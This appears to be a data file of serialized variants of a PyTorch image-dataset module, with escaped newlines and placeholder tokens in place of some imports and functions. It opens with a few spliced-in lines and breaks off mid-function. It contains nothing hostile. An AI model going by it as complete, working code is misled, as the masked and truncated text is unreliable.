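extra = [transforms.RandomHorizontalFlip(), transforms.RandomRotation(10)]
base[1:1] = extra      # -> Resize, Flip, Rotation, ToTensor, Normalize
pipeline = transforms.Compose(base)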
print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n\n def __init__(self, data_dir, data, transforms_=None, obj=False,\n minorities=None, diffs=None, bal_tfms=None):\n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if 
hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\ndef extract_data(dt):\n x = []\n y = []\n for a, b in dt:\n x.append(a)\n y.append(b)\n return x, y\n\n\ndef listdir_fullpath(d):\n return [os.path.join(d, f) for f in os.listdir(d)]\n\n\ndef get_minorities(df, thresh=0.8):\n c = df.iloc[:, 1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [(1 - x / max_count) for x in lc]\n diffs = dict((k, v) for k, v in zip(c.keys(), diffs))\n minorities = [c.keys()[x] for x, y in enumerate(lc) if y < thresh *\n max_count]\n return minorities, diffs\n\n\ndef csv_from_path(path, img_dest):\n path = Path(path)\n img_dest = Path(img_dest)\n labels_paths = list(path.iterdir())\n tr_images = []\n tr_labels = []\n for l in labels_paths:\n if l.is_dir():\n for i in list(l.iterdir()):\n if i.suffix in IMG_EXTENSIONS:\n name = i.name\n label = l.name\n new_name = '{}_{}'.format(path.name, name)\n new_path = img_dest / new_name\n os.rename(i, new_path)\n tr_images.append(new_name)\n tr_labels.append(label)\n tr_img_label = {'Img': tr_images, 'Label': tr_labels}\n csv = pd.DataFrame(tr_img_label, columns=['Img', 'Label'])\n csv = csv.sample(frac=1).reset_index(drop=True)\n return csv\n\n\ndef add_extension(a, e):\n a = [(x + e) for x in a]\n return a\n\n\ndef one_hot(targets, multi=False):\n if multi:\n binerizer = MultiLabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n else:\n binerizer = LabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n return dai_1hot, binerizer.classes_\n\n\ndef get_index(arr, a):\n for i in range(len(arr)):\n if sum(arr[i] == a) == 
len(a):\n return i\n return False\n\n\ndef rescale_bbox(bb, row_scale, col_scale):\n bb = bb.reshape((-1, 4))\n for b in bb:\n r1, c1, r2, c2 = b\n b[0] = int(np.round(r1 * col_scale))\n b[1] = int(np.round(c1 * row_scale))\n b[2] = int(np.round(r2 * col_scale))\n b[3] = int(np.round(c2 * row_scale))\n bb = bb.reshape((1, -1))\n return bb\n\n\ndef get_img_stats(dataset, sz):\n size = int(len(dataset) * sz)\n i = 0\n imgs = []\n for img, _ in dataset:\n if i > size:\n break\n imgs.append(img)\n i += 1\n imgs_ = torch.stack(imgs, dim=3)\n imgs_ = imgs_.view(3, -1)\n imgs_mean = imgs_.mean(dim=1)\n imgs_std = imgs_.std(dim=1)\n return imgs_mean, imgs_std\n\n\n<function token>\n\n\ndef save_obj(obj, path):\n with open(path, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef load_obj(path):\n with open(path, 'rb') as f:\n return pickle.load(f)\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = 
[t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, 
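# A sketch of the right-aligned zero padding applied to variable-length
# detection targets above: each row of boxes is packed into a fixed-width
# array so every sample yields a tensor of the same shape. Toy values only.
import numpy as np

targets = [[10, 20, 30, 40], [1, 2, 3, 4, 5, 6, 7, 8]]   # 1 box vs. 2 boxes
width = max(len(t) for t in targets)
padded = np.zeros((len(targets), width), dtype=int)
for i, row in enumerate(targets):
    padded[i, width - len(row):] = row                    # left-pad with zeros
# padded[0] -> [ 0  0  0  0 10 20 30 40]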
val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n 
-1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n\n def __init__(self, data_dir, data, transforms_=None, obj=False,\n minorities=None, diffs=None, bal_tfms=None):\n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, 
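# A compact sketch of the two-step pattern in get_data() above: estimate
# per-channel mean/std from a sample of training images (get_img_stats), then
# overwrite the .mean/.std attributes of the already-built Normalize
# transforms in place. The random tensors stand in for real images.
import torch
from torchvision import transforms

imgs = [torch.rand(3, 8, 8) for _ in range(16)]
flat = torch.stack(imgs, dim=3).view(3, -1)     # channels x all pixels
mean, std = flat.mean(dim=1), flat.std(dim=1)

norm = transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
norm.mean, norm.std = mean, std                 # patched in place, as above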
col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\ndef extract_data(dt):\n x = []\n y = []\n for a, b in dt:\n x.append(a)\n y.append(b)\n return x, y\n\n\ndef listdir_fullpath(d):\n return [os.path.join(d, f) for f in os.listdir(d)]\n\n\ndef get_minorities(df, thresh=0.8):\n c = df.iloc[:, 1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [(1 - x / max_count) for x in lc]\n diffs = dict((k, v) for k, v in zip(c.keys(), diffs))\n minorities = [c.keys()[x] for x, y in enumerate(lc) if y < thresh *\n max_count]\n return minorities, diffs\n\n\ndef csv_from_path(path, img_dest):\n path = Path(path)\n img_dest = Path(img_dest)\n labels_paths = list(path.iterdir())\n tr_images = []\n tr_labels = []\n for l in labels_paths:\n if l.is_dir():\n for i in list(l.iterdir()):\n if i.suffix in IMG_EXTENSIONS:\n name = i.name\n label = l.name\n new_name = '{}_{}'.format(path.name, name)\n new_path = img_dest / new_name\n os.rename(i, new_path)\n tr_images.append(new_name)\n tr_labels.append(label)\n tr_img_label = {'Img': tr_images, 'Label': tr_labels}\n csv = pd.DataFrame(tr_img_label, columns=['Img', 'Label'])\n csv = csv.sample(frac=1).reset_index(drop=True)\n return csv\n\n\ndef add_extension(a, e):\n a = [(x + e) for x in a]\n return a\n\n\ndef one_hot(targets, multi=False):\n if multi:\n binerizer = MultiLabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n else:\n binerizer = LabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n return dai_1hot, binerizer.classes_\n\n\ndef get_index(arr, a):\n for i in range(len(arr)):\n if sum(arr[i] == a) == len(a):\n return i\n return False\n\n\ndef rescale_bbox(bb, row_scale, col_scale):\n bb = bb.reshape((-1, 4))\n for b in bb:\n r1, c1, r2, c2 = b\n b[0] = int(np.round(r1 * col_scale))\n b[1] = int(np.round(c1 * row_scale))\n b[2] = int(np.round(r2 * col_scale))\n b[3] = int(np.round(c2 * row_scale))\n bb = bb.reshape((1, -1))\n return bb\n\n\ndef get_img_stats(dataset, sz):\n size = int(len(dataset) * sz)\n i = 0\n imgs = []\n for img, _ in dataset:\n if i > size:\n break\n imgs.append(img)\n i += 1\n imgs_ = torch.stack(imgs, dim=3)\n imgs_ = imgs_.view(3, -1)\n imgs_mean = imgs_.mean(dim=1)\n imgs_std = imgs_.std(dim=1)\n 
return imgs_mean, imgs_std\n\n\n<function token>\n\n\ndef save_obj(obj, path):\n with open(path, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\n\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n 
print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if 